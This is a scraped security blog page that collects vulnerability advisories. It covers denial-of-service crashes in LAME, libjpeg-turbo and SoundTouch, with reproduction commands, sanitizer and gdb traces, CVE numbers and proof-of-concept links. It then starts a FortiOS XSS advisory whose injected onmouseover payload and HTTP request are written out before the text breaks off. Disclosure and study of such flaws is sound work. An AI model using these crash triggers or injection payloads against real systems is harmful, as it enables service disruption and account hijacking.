LAME multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
Following the great history of GNU naming, LAME originally stood for LAME Ain't an Mp3 Encoder.
LAME is an educational tool to be used for learning about MP3 encoding. The goal of the LAME project is to use the open source model to improve the psycho acoustics, noise shaping and speed of MP3.
Affected version:
=====
3.99.5
Vulnerability Description:
==========================
1.
the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file.
./lame lame_3.99.5_heap_buffer_overflow.wav out
==26618==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000009f08 at pc 0x5f3a1e bp 0x7ffdfaf74620 sp 0x7ffdfaf74618
READ of size 4 at 0x60c000009f08 thread T0
#0 0x5f3a1d in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606
#1 0x5f3a1d in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
#2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736
#3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891
#4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963
#5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462
#6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531
#7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707
#8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470
#9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438
#10 0x7ff8c8771f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c)
0x60c000009f08 is located 8 bytes to the right of 128-byte region [0x60c000009e80,0x60c000009f00)
allocated by thread T0 here:
#0 0x46ba59 in calloc (/home/a/Downloads/lame-3.99.5/frontend/lame+0x46ba59)
#1 0x5f1302 in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:561
#2 0x5f1302 in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606 fill_buffer_resample
Shadow bytes around the buggy address:
0x0c187fff9390: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff93a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff93b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff93c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff93d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff93e0: fa[fa]fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff93f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff9400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff9410: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff9420: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff9430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==26618==ABORTING
POC:
lame_3.99.5_heap_buffer_overflow.wav
CVE:
CVE-2017-9410
2.
the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
./lame lame_3.99.5_invalid_memory_read_1.wav out
==30841==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005f24ed sp 0x7ffee94d3050 bp 0x000000000000 T0)
#0 0x5f24ec in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608
#1 0x5f24ec in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
#2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736
#3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891
#4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963
#5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462
#6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531
#7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707
#8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470
#9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438
#10 0x7f48b8cacf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608 fill_buffer_resample
==30841==ABORTING
POC:
lame_3.99.5_invalid_memory_read_1.wav
CVE:
CVE-2017-9411
3.
the unpack_read_samples function in frontend/get_audio.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
./lame lame_3.99.5_invalid_memory_read_2.wav out
(gdb) r
Starting program: lame file out
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x080f27b3 in unpack_read_samples (samples_to_read=-146880,
bytes_per_sample=<optimized out>, swap_order=-2088828928,
pcm_in=0xb6303d80, sample_buffer=<optimized out>) at get_audio.c:1204
1204 GA_URS_IFLOOP(1)
(gdb) disassemble 0x080f27b3,0x080f27ff
Dump of assembler code from 0x80f27b3 to 0x80f27ff:
=> 0x080f27b3 <get_audio_common+4051>:mov 0x20000000(%eax),%al
0x080f27b9 <get_audio_common+4057>:test %al,%al
0x080f27bb <get_audio_common+4059>:je 0x80f27d0 <get_audio_common+4080>
0x080f27bd <get_audio_common+4061>:mov $0x8320b78,%edx
0x080f27c2 <get_audio_common+4066>:and $0x7,%edx
0x080f27c5 <get_audio_common+4069>:add $0x3,%edx
0x080f27c8 <get_audio_common+4072>:cmp %al,%dl
0x080f27ca <get_audio_common+4074>:jge 0x80f6715 <get_audio_common+20277>
0x080f27d0 <get_audio_common+4080>:xor $0xf879,%ebx
0x080f27d6 <get_audio_common+4086>:add 0x8320b78,%ebx
0x080f27dc <get_audio_common+4092>:mov %ebx,%eax
0x080f27de <get_audio_common+4094>:shr $0x3,%eax
0x080f27e1 <get_audio_common+4097>:mov 0x20000000(%eax),%al
0x080f27e7 <get_audio_common+4103>:test %al,%al
0x080f27e9 <get_audio_common+4105>:je 0x80f27f8 <get_audio_common+4120>
0x080f27eb <get_audio_common+4107>:mov %ebx,%edx
0x080f27ed <get_audio_common+4109>:and $0x7,%edx
0x080f27f0 <get_audio_common+4112>:cmp %al,%dl
0x080f27f2 <get_audio_common+4114>:jge 0x80f6727 <get_audio_common+20295---Type <return> to continue, or q <return> to quit---
0x080f27f8 <get_audio_common+4120>:incb (%ebx)
0x080f27fa <get_audio_common+4122>:movl $0x7c3c,%gs%edi)
End of assembler dump.
(gdb) i r
eax 0x837f0000-2088828928
ecx 0x24489288
edx 0xbfee5e20-1074897376
ebx 0x7c3c31804
esp 0xbfee4c200xbfee4c20
ebp 0xbfee82780xbfee8278
esi 0xfffffcf2-782
edi 0xfffffffc-4
eip 0x80f27b30x80f27b3 <get_audio_common+4051>
eflags 0x10246[ PF ZF IF RF ]
cs 0x73115
ss 0x7b123
ds 0x7b123
es 0x7b123
fs 0x00
gs 0x3351
(gdb) x/20x 0x837f0000
0x837f0000:Cannot access memory at address 0x837f0000
POC:
lame_3.99.5_invalid_memory_read_2.wav
CVE:
CVE-2017-9412
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42390.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863135867
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
libjpeg-turbo denial of service vulnerability
======================
Author : qflb.wu
CVE : CVE-2017-9614
======================
Introduction:
=============
libjpeg-turbo is a JPEG image codec that uses SIMD instructions (MMX, SSE2, AVX2, NEON, AltiVec) to accelerate baseline JPEG compression and decompression on x86, x86-64, ARM, and PowerPC systems.
Affected version:
=====
1.5.1
Vulnerability Description:
==========================
the fill_input_buffer function in jdatasrc.c in libjpeg-turbo 1.5.1 can cause a denial of service(invalid address and application crash) via a crafted jpg file.
I found this bug when I test stills2dv-alpha-0.601 which used the libjpeg-turbo.
./stills2dv exampleworkfile.s2d
(the exampleworkfile.s2d contains the path of the poc jpg file)
----debug info:----
gdb-peda$ bt
#0 __memcpy_sse2 () at ../sysdeps/x86_64/multiarch/../memcpy.S:166
#1 0x00007ffff6d82323 in __GI__IO_file_xsgetn (fp=0x61c370,
data=<optimized out>, n=0x1000) at fileops.c:1387
#2 0x00007ffff6d7786f in __GI__IO_fread (buf=<optimized out>, size=0x1,
count=0x1000, fp=0x61c370) at iofread.c:42
#3 0x00007ffff7b6e23b in fill_input_buffer (cinfo=0x7fffffffe190)
at jdatasrc.c:107
#4 0x00007ffff7b7beef in get_dqt (cinfo=0x7fffffffe190) at jdmarker.c:516
#5 0x00007ffff7b7dba3 in read_markers (cinfo=0x7fffffffe190)
at jdmarker.c:1050
#6 0x00007ffff7b795fd in consume_markers (cinfo=0x7fffffffe190)
at jdinput.c:320
#7 0x00007ffff7b6c853 in jpeg_finish_decompress (cinfo=0x7fffffffe190)
at jdapimin.c:399
#8 0x0000000000402da0 in readjpg (
fn=fn@entry=0x61c2f4 "example_data_files/test.jpg") at s2d_jpg.c:148
#9 0x0000000000403c5b in openImage (
fn=0x61c2f4 "example_data_files/test.jpg", cache=0xffffffff)
at s2d_main.c:202
#10 0x00000000004063a5 in splitted2struct (p=p@entry=0x60acc0 <ms>,
strs=strs@entry=0x61c2a0) at s2d_main.c:1139
#11 0x000000000040240b in main (argc=argc@entry=0x2,
argv=argv@entry=0x7fffffffe5f8) at s2d_main.c:1404
#12 0x00007ffff6d2af45 in __libc_start_main (main=0x402040 <main>, argc=0x2,
argv=0x7fffffffe5f8, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe5e8) at libc-start.c:287
#13 0x0000000000402500 in _start ()
=================================================================================
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007ffff7b6e233107 nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE);
gdb-peda$
[----------------------------------registers-----------------------------------]
RAX: 0x61ce30 --> 0x464a1000e0ffd8ff
RBX: 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (<error_exit>:push rbp)
RCX: 0x61c370 ("example_data_files/test.jpg")
RDX: 0x1000
RSI: 0x1
RDI: 0x61ce30 --> 0x464a1000e0ffd8ff
RBP: 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg")
RSP: 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0
RIP: 0x7ffff7b6e236 (<fill_input_buffer+56>
R8 : 0x67706a2e747365 ('est.jpg')
R9 : 0x7ffff70ca7b8 --> 0x623770 --> 0x0
R10: 0x7fffffffde90 --> 0x0
R11: 0x7ffff7b6c74c (<jpeg_finish_decompress>:push rbp)
R12: 0x61c2f4 ("example_data_files/test.jpg")
R13: 0x61c5b0 --> 0x61c370 ("example_data_files/test.jpg")
R14: 0xc00 ('')
R15: 0x3
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff7b6e229 <fill_input_buffer+43>:mov edx,0x1000
0x7ffff7b6e22e <fill_input_buffer+48>:mov esi,0x1
0x7ffff7b6e233 <fill_input_buffer+53>:mov rdi,rax
=> 0x7ffff7b6e236 <fill_input_buffer+56>:
call 0x7ffff7b477f0 <fread@plt>
0x7ffff7b6e23b <fill_input_buffer+61>:mov QWORD PTR [rbp-0x10],rax
0x7ffff7b6e23f <fill_input_buffer+65>:cmp QWORD PTR [rbp-0x10],0x0
0x7ffff7b6e244 <fill_input_buffer+70>:
jne 0x7ffff7b6e2bb <fill_input_buffer+189>
0x7ffff7b6e246 <fill_input_buffer+72>:mov rax,QWORD PTR [rbp-0x8]
Guessed arguments:
arg[0]: 0x61ce30 --> 0x464a1000e0ffd8ff
arg[1]: 0x1
arg[2]: 0x1000
arg[3]: 0x61c370 ("example_data_files/test.jpg")
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0
0008| 0x7fffffffdfd8 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (<error_exit>:push rbp)
0016| 0x7fffffffdfe0 --> 0x5bffffe0bc
0024| 0x7fffffffdfe8 --> 0x61c880 --> 0x61d028 --> 0x0
0032| 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg")
0040| 0x7fffffffdff8 --> 0x7ffff7b7beef (<get_dqt+71>:test eax,eax)
0048| 0x7fffffffe000 --> 0x0
0056| 0x7fffffffe008 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (<error_exit>:push rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007ffff7b6e236107 nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE);
gdb-peda$ x/20x $rdi
0x61ce30:0x464a1000e0ffd8ff0x1c00020101004649
0x61ce40:0x4300dbff00001c000x28191e231e1c2800
0x61ce50:0x3c30282b2d2321230x587b3c37373c4164
0x61ce60:0x8f9699809164495d0xa0c3e6b4a08a8c80
0x61ce70:0xcbffc88c8aaddaaa0xc19bfffffff5eeda
0x61ce80:0xfffde6fffaffffff0x2d2b014300dbfff8
0x61ce90:0x764141763c353c2d0xf8f8f8f8a58ca5f8
0x61cea0:0xf8f8f8f8f8f8f8f80xf8f8f8f8f8f8f8f8
0x61ceb0:0xf8f8f8f8f8f8f8f80xf8f8f8f8f8f8f8f8
0x61cec0:0xf8f8f8f8f8f8f8f80xc0fff8f8f8f8f8f8
gdb-peda$ ni
Program received signal SIGSEGV, Segmentation fault.
POC:
test.jpg;exampleworkfile.s2d
CVE:
CVE-2017-9614
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42391.zip
SoundTouch multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
SoundTouch is an open-source audio processing library for changing the Tempo, Pitch and Playback Rates of audio streams or audio files. The library additionally supports estimating stable beats-per-minute rates for audio tracks.
Affected version:
=====
1.9.2
Vulnerability Description:
==========================
1.
the TDStretch::processSamples function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service(infinite loop and CPU consumption) via a crafted wav file.
./soundstretch SoundTouch_1.9.2_infinite_loop.wav out
POC:
SoundTouch_1.9.2_infinite_loop.wav
CVE:
CVE-2017-9258
2.
the TDStretch::acceptNewOverlapLength function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service(memory allocation error and application crash) via a crafted wav file.
./soundstretch SoundTouch_1.9.2_memory_allocation_error.wav out
==87485==ERROR: AddressSanitizer failed to allocate 0x16103e000 (5922611200) bytes of LargeMmapAllocator: 12
==87485==Process memory map follows:
0x000000400000-0x0000004c7000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch
0x0000006c7000-0x0000006c8000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch
0x0000006c8000-0x0000006ca000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch
0x0000006ca000-0x000001b0e000
0x00007fff7000-0x00008fff7000
0x00008fff7000-0x02008fff7000
0x02008fff7000-0x10007fff8000
0x600000000000-0x603000000000
0x603000000000-0x603000010000
0x603000010000-0x604000000000
0x604000000000-0x604000010000
0x604000010000-0x608000000000
0x608000000000-0x608000010000
0x608000010000-0x60b000000000
0x60b000000000-0x60b000010000
0x60b000010000-0x60e000000000
0x60e000000000-0x60e000010000
0x60e000010000-0x611000000000
0x611000000000-0x611000010000
0x611000010000-0x615000000000
0x615000000000-0x615000020000
0x615000020000-0x616000000000
0x616000000000-0x616000020000
0x616000020000-0x619000000000
0x619000000000-0x619000020000
0x619000020000-0x61e000000000
0x61e000000000-0x61e000020000
0x61e000020000-0x621000000000
0x621000000000-0x621000020000
0x621000020000-0x624000000000
0x624000000000-0x624000020000
0x624000020000-0x640000000000
0x640000000000-0x640000003000
0x7fdf6b253000-0x7fdf6d756000
0x7fdf6d756000-0x7fdf6d914000/lib/x86_64-linux-gnu/libc-2.19.so
0x7fdf6d914000-0x7fdf6db13000/lib/x86_64-linux-gnu/libc-2.19.so
0x7fdf6db13000-0x7fdf6db17000/lib/x86_64-linux-gnu/libc-2.19.so
0x7fdf6db17000-0x7fdf6db19000/lib/x86_64-linux-gnu/libc-2.19.so
0x7fdf6db19000-0x7fdf6db1e000
0x7fdf6db1e000-0x7fdf6db34000/lib/x86_64-linux-gnu/libgcc_s.so.1
0x7fdf6db34000-0x7fdf6dd33000/lib/x86_64-linux-gnu/libgcc_s.so.1
0x7fdf6dd33000-0x7fdf6dd34000/lib/x86_64-linux-gnu/libgcc_s.so.1
0x7fdf6dd34000-0x7fdf6de1a000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19
0x7fdf6de1a000-0x7fdf6e019000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19
0x7fdf6e019000-0x7fdf6e021000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19
0x7fdf6e021000-0x7fdf6e023000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19
0x7fdf6e023000-0x7fdf6e038000
0x7fdf6e038000-0x7fdf6e03b000/lib/x86_64-linux-gnu/libdl-2.19.so
0x7fdf6e03b000-0x7fdf6e23a000/lib/x86_64-linux-gnu/libdl-2.19.so
0x7fdf6e23a000-0x7fdf6e23b000/lib/x86_64-linux-gnu/libdl-2.19.so
0x7fdf6e23b000-0x7fdf6e23c000/lib/x86_64-linux-gnu/libdl-2.19.so
0x7fdf6e23c000-0x7fdf6e243000/lib/x86_64-linux-gnu/librt-2.19.so
0x7fdf6e243000-0x7fdf6e442000/lib/x86_64-linux-gnu/librt-2.19.so
0x7fdf6e442000-0x7fdf6e443000/lib/x86_64-linux-gnu/librt-2.19.so
0x7fdf6e443000-0x7fdf6e444000/lib/x86_64-linux-gnu/librt-2.19.so
0x7fdf6e444000-0x7fdf6e45d000/lib/x86_64-linux-gnu/libpthread-2.19.so
0x7fdf6e45d000-0x7fdf6e65c000/lib/x86_64-linux-gnu/libpthread-2.19.so
0x7fdf6e65c000-0x7fdf6e65d000/lib/x86_64-linux-gnu/libpthread-2.19.so
0x7fdf6e65d000-0x7fdf6e65e000/lib/x86_64-linux-gnu/libpthread-2.19.so
0x7fdf6e65e000-0x7fdf6e662000
0x7fdf6e662000-0x7fdf6e767000/lib/x86_64-linux-gnu/libm-2.19.so
0x7fdf6e767000-0x7fdf6e966000/lib/x86_64-linux-gnu/libm-2.19.so
0x7fdf6e966000-0x7fdf6e967000/lib/x86_64-linux-gnu/libm-2.19.so
0x7fdf6e967000-0x7fdf6e968000/lib/x86_64-linux-gnu/libm-2.19.so
0x7fdf6e968000-0x7fdf6e9bd000/usr/local/lib/libSoundTouch.so.1.0.0
0x7fdf6e9bd000-0x7fdf6ebbd000/usr/local/lib/libSoundTouch.so.1.0.0
0x7fdf6ebbd000-0x7fdf6ebbe000/usr/local/lib/libSoundTouch.so.1.0.0
0x7fdf6ebbe000-0x7fdf6ebc1000/usr/local/lib/libSoundTouch.so.1.0.0
0x7fdf6ebc1000-0x7fdf6ebe4000/lib/x86_64-linux-gnu/ld-2.19.so
0x7fdf6edb1000-0x7fdf6edc8000
0x7fdf6edca000-0x7fdf6edd7000
0x7fdf6edda000-0x7fdf6ede3000
0x7fdf6ede3000-0x7fdf6ede4000/lib/x86_64-linux-gnu/ld-2.19.so
0x7fdf6ede4000-0x7fdf6ede5000/lib/x86_64-linux-gnu/ld-2.19.so
0x7fdf6ede5000-0x7fdf6ede6000
0x7ffcb0503000-0x7ffcb0524000[stack]
0x7ffcb05a4000-0x7ffcb05a6000[vvar]
0x7ffcb05a6000-0x7ffcb05a8000[vdso]
0xffffffffff600000-0xffffffffff601000[vsyscall]
==87485==End of process memory map.
==87485==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
#0 0x46da6f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46da6f)
#1 0x4732d1 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x4732d1)
#2 0x477b9e in __sanitizer::MmapOrDie(unsigned long, char const*) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x477b9e)
#3 0x433278 in __sanitizer::LargeMmapAllocator<__asan::AsanMapUnmapCallback>::Allocate(__sanitizer::AllocatorStats*, unsigned long, unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x433278)
#4 0x42f2bb in __asan::Allocate(unsigned long, unsigned long, __sanitizer::StackTrace*, __asan::AllocType, bool) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x42f2bb)
#5 0x46824d in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46824d)
#6 0x7fdf6e993d8e in soundtouch::TDStretch::acceptNewOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:724
#7 0x7fdf6e993d8e in soundtouch::TDStretch::calculateOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:1008
#8 0x7fdf6e9901f0 in soundtouch::TDStretch::setParameters(int, int, int, int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:158
#9 0x7fdf6e998910 in soundtouch::TDStretch::setChannels(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:599
#10 0x47f825 in setup(soundtouch::SoundTouch*, WavInFile const*, RunParameters const*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:127
#11 0x47f825 in main /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:310
#12 0x7fdf6d777f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#13 0x47dbac in _start (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac)
POC:
SoundTouch_1.9.2_infinite_loop.wav
CVE:
CVE-2017-9259
3.
the TDStretchSSE::calcCrossCorr function in source/SoundTouch/sse_optimized.cpp in SoundTouch 1.9.2 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file.
./soundstretch SoundTouch_1.9.2_heap_buffer_overflow.wav out
==87598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000007110 at pc 0x7f5076e3c3dc bp 0x7ffda7a42e10 sp 0x7ffda7a42e08
READ of size 16 at 0x625000007110 thread T0
#0 0x7f5076e3c3db in soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&) /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120:35
#1 0x7f5076e1f0f9 in soundtouch::TDStretch::seekBestOverlapPositionFull(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:305
#2 0x7f5076e1ee2c in soundtouch::TDStretch::seekBestOverlapPosition(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:258
#3 0x7f5076e21e88 in soundtouch::TDStretch::processSamples() /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:659
#4 0x7f5076e12893 in soundtouch::FIFOSamplePipe::moveSamples(soundtouch::FIFOSamplePipe&) /home/a/Downloads/soundtouch/source/SoundTouch/../../include/FIFOSamplePipe.h:88
#5 0x7f5076e12893 in soundtouch::SoundTouch::putSamples(float const*, unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/SoundTouch.cpp:334
#6 0x480f5e in process(soundtouch::SoundTouch*, WavInFile*, WavOutFile*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:200
#7 0x480f5e in main /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:314
#8 0x7f5075c00f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#9 0x47dbac in _start (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac)
0x625000007110 is located 0 bytes to the right of 8208-byte region [0x625000005100,0x625000007110)
allocated by thread T0 here:
#0 0x468209 in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x468209)
#1 0x7f5076e055db in soundtouch::FIFOSampleBuffer::ensureCapacity(unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/FIFOSampleBuffer.cpp:174
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120 soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&)
Shadow bytes around the buggy address:
0x0c4a7fff8dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4a7fff8e20: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==87598==ABORTING
POC:
SoundTouch_1.9.2_heap_buffer_overflow.wav
CVE:
CVE-2017-9260
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42389.zip
# Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities
# Vendor: Fortinet (www.fortinet.com)
# CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133
# Date: 28.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Affected FortiNet products:
* CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0
* CVE-2017-3132 : FortiOS versions upto 5.6.0
* CVE-2017-3133 : FortiOS versions upto 5.6.0
Fix:
Upgrade to FortiOS version 5.6.1
Video PoC (add admin):
https://youtu.be/fcpLStCD61Q
Vendor advisory:
https://fortiguard.com/psirt/FG-IR-17-104
Vulns:
1. XSS in WEB UI - Applications:
URL:
https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y
Http request:
GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
